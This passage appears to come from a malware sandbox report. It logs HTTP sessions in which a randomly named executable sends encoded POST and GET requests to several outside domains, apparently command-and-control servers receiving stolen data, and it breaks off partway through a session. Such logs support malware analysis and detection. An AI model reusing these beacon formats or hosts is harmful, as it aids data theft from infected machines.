                                                          Data Ascii: 1b98 #MhEJ^3pNN57KNn^uOtBb9VcT0IVtc|`,<pwm0$QAMKqwx[Z1M$F~~n_{9|.w>|e0Kxc>%q1/.Kx{8cJ$/5X!b"V9&Te:\gBHYT.\7~T\Xmx'RD8-s-DO]L]4$z.=MS*"5b( +PUUv;Gjr"v1F[D=Hp(y.Ek"%3HO%/7.>h2G/JAdJ[hV$:R0


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          12192.168.2.549989185.27.134.206803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:43.744018078 CET385OUTGET /g3h7/?KBEhCJ=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&Kdr=RN-HMNoXj6pXm HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          Host: www.canadavinreport.site
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Jan 11, 2025 01:40:44.442990065 CET1199INHTTP/1.1 200 OK
                                                          Server: nginx
                                                          Date: Sat, 11 Jan 2025 00:40:44 GMT
                                                          Content-Type: text/html
                                                          Content-Length: 998
                                                          Connection: close
                                                          Expires: Thu, 01 Jan 1970 00:00:01 GMT
                                                          Cache-Control: no-cache
                                                          Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 2f 61 65 73 2e 6a 73 22 20 3e 3c 2f 73 63 72 69 70 74 3e 3c 73 63 72 69 70 74 3e 66 75 6e 63 74 69 6f 6e 20 74 6f 4e 75 6d 62 65 72 73 28 64 29 7b 76 61 72 20 65 3d 5b 5d 3b 64 2e 72 65 70 6c 61 63 65 28 2f 28 2e 2e 29 2f 67 2c 66 75 6e 63 74 69 6f 6e 28 64 29 7b 65 2e 70 75 73 68 28 70 61 72 73 65 49 6e 74 28 64 2c 31 36 29 29 7d 29 3b 72 65 74 75 72 6e 20 65 7d 66 75 6e 63 74 69 6f 6e 20 74 6f 48 65 78 28 29 7b 66 6f 72 28 76 61 72 20 64 3d 5b 5d 2c 64 3d 31 3d 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 26 26 61 72 67 75 6d 65 6e 74 73 5b 30 5d 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 41 72 72 61 79 3f 61 72 67 75 6d 65 6e 74 73 5b 30 5d 3a 61 72 67 75 6d 65 6e 74 73 2c 65 3d 22 22 2c 66 3d 30 3b 66 3c 64 2e 6c 65 6e 67 74 68 3b 66 2b 2b 29 65 2b 3d 28 31 36 3e 64 5b 66 5d 3f 22 30 22 3a 22 22 29 2b 64 5b 66 5d 2e 74 6f 53 74 72 69 6e 67 28 31 36 [TRUNCATED]
                                                          Data Ascii: <html><body><script type="text/javascript" src="/aes.js" ></script><script>function toNumbers(d){var e=[];d.replace(/(..)/g,function(d){e.push(parseInt(d,16))});return e}function toHex(){for(var d=[],d=1==arguments.length&&arguments[0].constructor==Array?arguments[0]:arguments,e="",f=0;f<d.length;f++)e+=(16>d[f]?"0":"")+d[f].toString(16);return e.toLowerCase()}var a=toNumbers("f655ba9d09a112d4968c63579db590b4"),b=toNumbers("98344c2eee86c3994890592585b49f80"),c=toNumbers("3068b69ecd604df9250f19fc976177ff");document.cookie="__test="+toHex(slowAES.decrypt(c,2,a,b))+"; expires=Thu, 31-Dec-37 23:55:55 GMT; path=/"; location.href="http://www.canadavinreport.site/g3h7/?KBEhCJ=dyqW+SkpLS8uL5dRky9k7MKcOglS/8z1zEHoC4ozp/UuBc9Lrzv6UHKMHP5rOiU//FkNbu8cLS6TGHyjoU1BXuIfA/6aNcSUPn2xNM4zETNmyU4aFxTXIL5EZw83E41rkQ==&Kdr=RN-HMNoXj6pXm&i=1";</script><noscript>This site requires Javascript to work, please enable Javascript in your browser or use a browser with Javascript support</noscript></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          13192.168.2.549990165.154.96.210803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:50.752645016 CET635OUTPOST /t322/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.yunlekeji.top
                                                          Origin: http://www.yunlekeji.top
                                                          Referer: http://www.yunlekeji.top/t322/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 65 48 2f 6d 2b 57 65 79 50 64 6f 37 58 5a 6f 50 43 7a 71 43 6d 78 53 30 5a 79 76 6d 67 45 70 33 46 4b 77 6b 6a 53 4b 6e 6d 74 43 34 4f 56 2b 6c 42 79 49 35 51 53 48 31 6f 7a 49 58 2b 2f 32 61 35 6b 58 61 64 54 58 36 57 66 46 67 76 50 33 78 62 76 62 72 6c 2f 4b 65 46 34 57 6d 45 78 67 2b 43 56 43 44 48 6a 61 6e 49 59 4c 46 38 61 33 31 78 75 6c 62 52 5a 71 53 70 45 45 49 2f 6d 66 43 2f 4d 75 67 55 72 57 55 66 37 49 53 52 36 74 4d 63 36 56 62 37 30 4e 39 65 74 36 37 4a 59 56 59 54 4c 69 46 42 6b 36 49 51 57 4e 79 34 46 70 6a 67 46 65 7a 78 59 6f 64 4e 61 6f 3d
                                                          Data Ascii: KBEhCJ=IA33BtMMTtUPeH/m+WeyPdo7XZoPCzqCmxS0ZyvmgEp3FKwkjSKnmtC4OV+lByI5QSH1ozIX+/2a5kXadTX6WfFgvP3xbvbrl/KeF4WmExg+CVCDHjanIYLF8a31xulbRZqSpEEI/mfC/MugUrWUf7ISR6tMc6Vb70N9et67JYVYTLiFBk6IQWNy4FpjgFezxYodNao=
                                                          Jan 11, 2025 01:40:51.699592113 CET1236INHTTP/1.1 404 Not Found
                                                          Server: F-WEB
                                                          Date: Sat, 11 Jan 2025 00:40:51 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 910
                                                          Connection: close
                                                          FAI-W-FLOW: 2024788038
                                                          Service-Lane: e8594f12d42b28ee5775cc58b9d2e933
                                                          FAI-W-AGENT_AID: 32663896
                                                          Update-Time: 1736399500
                                                          Src-Update: true
                                                          P3P: CP=CAO PSA OUR
                                                          Origin-Agent-Cluster: ?0
                                                          X-Content-Type-Options: nosniff
                                                          X-Permitted-Cross-Domain-Policies: none
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Download-Options: noopen
                                                          X-Frame-Options: SAMEORIGIN
                                                          Set-Cookie: _cliid=Yt-M2Dezds0snXOL; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 00:40:51 GMT; HttpOnly
                                                          Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 00:40:51 GMT; HttpOnly
                                                          Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
                                                          Jan 11, 2025 01:40:51.699661016 CET426INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63
                                                          Data Ascii: <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="b


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          14192.168.2.549991165.154.96.210803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:53.310786963 CET655OUTPOST /t322/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 227
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.yunlekeji.top
                                                          Origin: http://www.yunlekeji.top
                                                          Referer: http://www.yunlekeji.top/t322/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 64 6e 50 6d 78 52 69 79 4b 39 6f 34 4a 4a 6f 50 49 54 71 47 6d 77 75 30 5a 7a 71 72 67 53 78 33 46 71 67 6b 69 54 4b 6e 68 74 43 34 64 56 2f 76 50 53 49 75 51 53 44 58 6f 32 49 58 2b 2b 57 61 35 6c 48 61 64 67 50 35 58 50 46 69 6e 76 33 33 56 50 62 72 6c 2f 4b 65 46 34 71 63 45 78 6f 2b 43 67 53 44 48 47 6d 67 4a 59 4c 45 37 61 33 31 37 4f 6b 53 52 5a 71 73 70 42 63 75 2f 6c 6e 43 2f 50 36 67 56 2b 69 58 55 37 4a 62 4a 61 73 6a 4e 37 34 2f 37 47 64 33 42 50 76 74 51 35 31 37 66 64 54 76 62 47 79 67 44 32 68 4b 6f 57 68 55 78 31 2f 61 72 37 34 74 54 4e 2b 30 2b 4c 74 42 59 36 36 57 42 44 33 67 76 4a 6a 50 47 56 43 52
                                                          Data Ascii: KBEhCJ=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgSx3FqgkiTKnhtC4dV/vPSIuQSDXo2IX++Wa5lHadgP5XPFinv33VPbrl/KeF4qcExo+CgSDHGmgJYLE7a317OkSRZqspBcu/lnC/P6gV+iXU7JbJasjN74/7Gd3BPvtQ517fdTvbGygD2hKoWhUx1/ar74tTN+0+LtBY66WBD3gvJjPGVCR
                                                          Jan 11, 2025 01:40:54.241890907 CET1236INHTTP/1.1 404 Not Found
                                                          Server: F-WEB
                                                          Date: Sat, 11 Jan 2025 00:40:53 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 910
                                                          Connection: close
                                                          FAI-W-FLOW: 2024857038
                                                          Service-Lane: e8594f12d42b28ee5775cc58b9d2e933
                                                          FAI-W-AGENT_AID: 32663896
                                                          Update-Time: 1736399500
                                                          Src-Update: true
                                                          P3P: CP=CAO PSA OUR
                                                          Origin-Agent-Cluster: ?0
                                                          X-Content-Type-Options: nosniff
                                                          X-Permitted-Cross-Domain-Policies: none
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Download-Options: noopen
                                                          X-Frame-Options: SAMEORIGIN
                                                          Set-Cookie: _cliid=-UBW-xCVP4Rlj2GZ; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 00:40:54 GMT; HttpOnly
                                                          Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 00:40:54 GMT; HttpOnly
                                                          Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
                                                          Jan 11, 2025 01:40:54.241940022 CET426INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63
                                                          Data Ascii: <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="b


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          15192.168.2.549992165.154.96.210803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:55.854413986 CET1672OUTPOST /t322/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 1243
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.yunlekeji.top
                                                          Origin: http://www.yunlekeji.top
                                                          Referer: http://www.yunlekeji.top/t322/
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Data Raw: 4b 42 45 68 43 4a 3d 49 41 33 33 42 74 4d 4d 54 74 55 50 64 6e 50 6d 78 52 69 79 4b 39 6f 34 4a 4a 6f 50 49 54 71 47 6d 77 75 30 5a 7a 71 72 67 53 35 33 46 5a 59 6b 6a 77 79 6e 67 74 43 34 47 31 2f 73 50 53 49 76 51 55 72 54 6f 32 4d 74 2b 37 53 61 2f 31 62 61 62 52 50 35 65 50 46 69 34 66 33 79 62 76 61 2f 6c 37 75 61 46 2b 4b 63 45 78 6f 2b 43 6e 71 44 41 54 61 67 45 34 4c 46 38 61 33 70 78 75 6b 36 52 5a 69 38 70 42 70 54 2f 56 48 43 2b 76 71 67 58 49 2b 58 57 62 4a 5a 63 61 73 37 4e 37 30 67 37 47 42 64 42 4f 62 55 51 2b 42 37 61 73 2b 75 42 44 53 67 57 47 5a 4b 6b 30 46 76 6a 79 57 34 6a 64 34 6e 57 4e 69 48 30 4c 4a 55 4e 2f 2b 52 4e 7a 71 6c 34 76 7a 62 41 77 44 63 57 53 7a 5a 30 6e 49 78 45 34 6c 63 52 34 4f 49 48 59 64 56 58 79 63 63 54 36 37 61 51 4b 72 41 6e 51 79 50 49 6a 30 31 6a 36 76 4b 74 44 70 64 4c 73 48 51 41 56 49 70 37 6d 33 31 4f 75 31 32 7a 30 65 48 6f 79 53 38 35 30 59 63 7a 35 4f 38 46 57 51 31 70 36 4a 46 4a 56 2b 7a 6a 30 4e 52 6e 58 35 36 58 4a 6d 32 46 79 52 62 70 41 66 [TRUNCATED]
                                                          Data Ascii: KBEhCJ=IA33BtMMTtUPdnPmxRiyK9o4JJoPITqGmwu0ZzqrgS53FZYkjwyngtC4G1/sPSIvQUrTo2Mt+7Sa/1babRP5ePFi4f3ybva/l7uaF+KcExo+CnqDATagE4LF8a3pxuk6RZi8pBpT/VHC+vqgXI+XWbJZcas7N70g7GBdBObUQ+B7as+uBDSgWGZKk0FvjyW4jd4nWNiH0LJUN/+RNzql4vzbAwDcWSzZ0nIxE4lcR4OIHYdVXyccT67aQKrAnQyPIj01j6vKtDpdLsHQAVIp7m31Ou12z0eHoyS850Ycz5O8FWQ1p6JFJV+zj0NRnX56XJm2FyRbpAfZKgeIv0mVh/bJB2NuDRd+jOCyqL6wuMTYlGiBxN2Cy1HNp4suC8BmnTCvws1xggy+f/xTDGuqm4f5QXMGCOOnVC8Ims3+C0NxPXmuTUYfwQhTubJiBCIf7ZaDkW/yINlD28OuzwxAvsVQKBVdlHAE5TPJbbqrEkMN3rTk7dstjJdc3FVIc9Rc2OHk/rI5yjZJiby29ChRWpkOVb3g86PipRybRweEetmoTyXLl7Utk6HeY8ayJOUXQzLmoLgkAODW6RMVqFyttVx3S7a4PS46eKisrQKB1Wqgd0f/9UeUmxWlbcuhRFASN056u+gUVVF/eGEJfrBgqCxobHl0Ng9Du9zyNRjsNEixb23zXNL675ZTgPorBvG+1BiYl/AZc2RiKmQFV46jc+kp0U1Xtb/SMPCdmzS8LlgubfJbtG4bE9mlsuRRlQBAhJoIf3qZcxaSAnkMMKGZuHVblJ6ikp8d3PxbuzT6K1YQ54ScmrtIcCMwzznAc+sniNevGEr6h5q0zYWpzicfWWnZtHM8uholePAxQHc6gUeoNqQ6CztzcAjpZanoOsLsFYV5uwmk6mG1mFZ8DD/UHgaHpCjQPM62nDDAB03X3vFbG9CaLP/D2+6IYO/I0U/IKJANFPvp60Ob0OK+2Dp4MTz+yG5AiPbPlCtfFyKbxvEI6 [TRUNCATED]
                                                          Jan 11, 2025 01:40:56.783948898 CET1236INHTTP/1.1 404 Not Found
                                                          Server: F-WEB
                                                          Date: Sat, 11 Jan 2025 00:40:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Content-Length: 910
                                                          Connection: close
                                                          FAI-W-FLOW: 2024950038
                                                          Service-Lane: e8594f12d42b28ee5775cc58b9d2e933
                                                          FAI-W-AGENT_AID: 32663896
                                                          Update-Time: 1736399500
                                                          Src-Update: true
                                                          P3P: CP=CAO PSA OUR
                                                          Origin-Agent-Cluster: ?0
                                                          X-Content-Type-Options: nosniff
                                                          X-Permitted-Cross-Domain-Policies: none
                                                          X-XSS-Protection: 1; mode=block
                                                          X-Download-Options: noopen
                                                          X-Frame-Options: SAMEORIGIN
                                                          Set-Cookie: _cliid=7VBI_xSSfsUkn3GJ; domain=www.yunlekeji.top; path=/; expires=Sun, 11-Jan-2026 00:40:56 GMT; HttpOnly
                                                          Set-Cookie: _lastEnterDay=2025-01-11; domain=www.yunlekeji.top; path=/; expires=Mon, 13-Jan-2025 00:40:56 GMT; HttpOnly
                                                          Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div>
                                                          Jan 11, 2025 01:40:56.783994913 CET426INData Raw: 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 75 6f 77 75 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 73 67 22 3e 0a 09 09 09 3c 64 69 76 20 63
                                                          Data Ascii: <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="b


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          16192.168.2.549993165.154.96.210803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:40:58.396231890 CET378OUTGET /t322/?Kdr=RN-HMNoXj6pXm&KBEhCJ=FCfXCbowRdQKA3bKzmWhb/MMDIYWCwffvgnpa1jm1l5RPo8GmzCZxrunal2GKioIIi33qnUs85PYplnvRA3XX9RPs5/iUffq0tmKE8rYJBtcI2bhCRGcMbzPlb/C9uxVPg== HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Connection: close
                                                          Host: www.yunlekeji.top
                                                          User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36
                                                          Jan 11, 2025 01:40:59.308166981 CET1236INHTTP/1.1 404 Not Found
                                                          Content-Type: text/html; charset=UTF-8
                                                          Connection: close
                                                          Date: Sat, 11 Jan 2025 00:40:56 GMT
                                                          Content-Length: 910
                                                          X-Content-Type-Options: nosniff
                                                          X-Frame-Options: SAMEORIGIN
                                                          X-Download-Options: noopen
                                                          X-XSS-Protection: 1; mode=block
                                                          Cache-Flow: 2583346554
                                                          Origin-Agent-Cluster: ?0
                                                          FAI-W-FLOW: 2025038038
                                                          FAI-W-AGENT-AID: 32663896
                                                          Service-Lane: e8594f12d42b28ee5775cc58b9d2e933
                                                          P3P: CP=CAO PSA OUR
                                                          X-Permitted-Cross-Domain-Policies: none
                                                          Server: F-WEB
                                                          Data Raw: 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 30 22 3e 0a 3c 74 69 74 6c 65 3e e7 b3 bb e7 bb 9f e6 8f 90 e7 a4 ba 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 68 72 65 66 3d 27 2f 2f 32 2e 73 73 2e 35 30 38 73 79 73 2e 63 6f 6d 2f 63 73 73 2f 64 69 73 74 2f 73 74 79 6c 65 73 2f 7a 68 61 6f 62 75 64 61 6f 79 65 2e 6d 69 6e 2e 63 73 73 3f 76 3d 32 30 32 34 30 32 32 32 31 35 33 30 27 20 72 65 6c 3d 22 73 74 79 6c 65 [TRUNCATED]
                                                          Data Ascii: <!DOCTYPE HTML><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=0"><title></title><link type="text/css" href='//2.ss.508sys.com/css/dist/styles/zhaobudaoye.min.css?v=202402221530' rel="stylesheet" /></head><body class=""><div class="box"><div class="titleContent"> <div class="title"></div> </div> <div class="content"><div class="cuowuImg"></div><div class="msg"><div class="img"> </div><div class="info">404: </div></div> <div class="cuowuButton"><a href='/'><div class="back" style="margi
                                                          Jan 11, 2025 01:40:59.308187962 CET166INData Raw: 6e 2d 6c 65 66 74 3a 20 30 70 78 3b 22 3e 0a 09 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 62 61 63 6b 49 6d 67 22 3e 3c 2f 64 69 76 3e 0a 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 61 63 6b 54 78 74 22 3e e8 bf 94 e5 9b 9e e9
                                                          Data Ascii: n-left: 0px;"><div class="backImg"></div><span class="backTxt"></span></div></a></div></div> </div></body></html>


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          17192.168.2.54999445.141.156.114803668C:\Program Files (x86)\vdqIvPNRsFkuIPyVUKWYPmxKViehkAcZdSQMyQDe\ldZEVEbpOrO.exe
                                                          TimestampBytes transferredDirectionData
                                                          Jan 11, 2025 01:41:04.371803045 CET632OUTPOST /iuvu/ HTTP/1.1
                                                          Accept: */*
                                                          Accept-Language: en-US
                                                          Accept-Encoding: gzip, deflate, br
                                                          Content-Length: 207
                                                          Connection: close
                                                          Content-Type: application/x-www-form-urlencoded
                                                          Cache-Control: max-age=0
                                                          Host: www.logidant.xyz
                                                          Origin: http://www.logidant.xyz
                                                          Referer: http://www.logidant.xyz/iuvu/
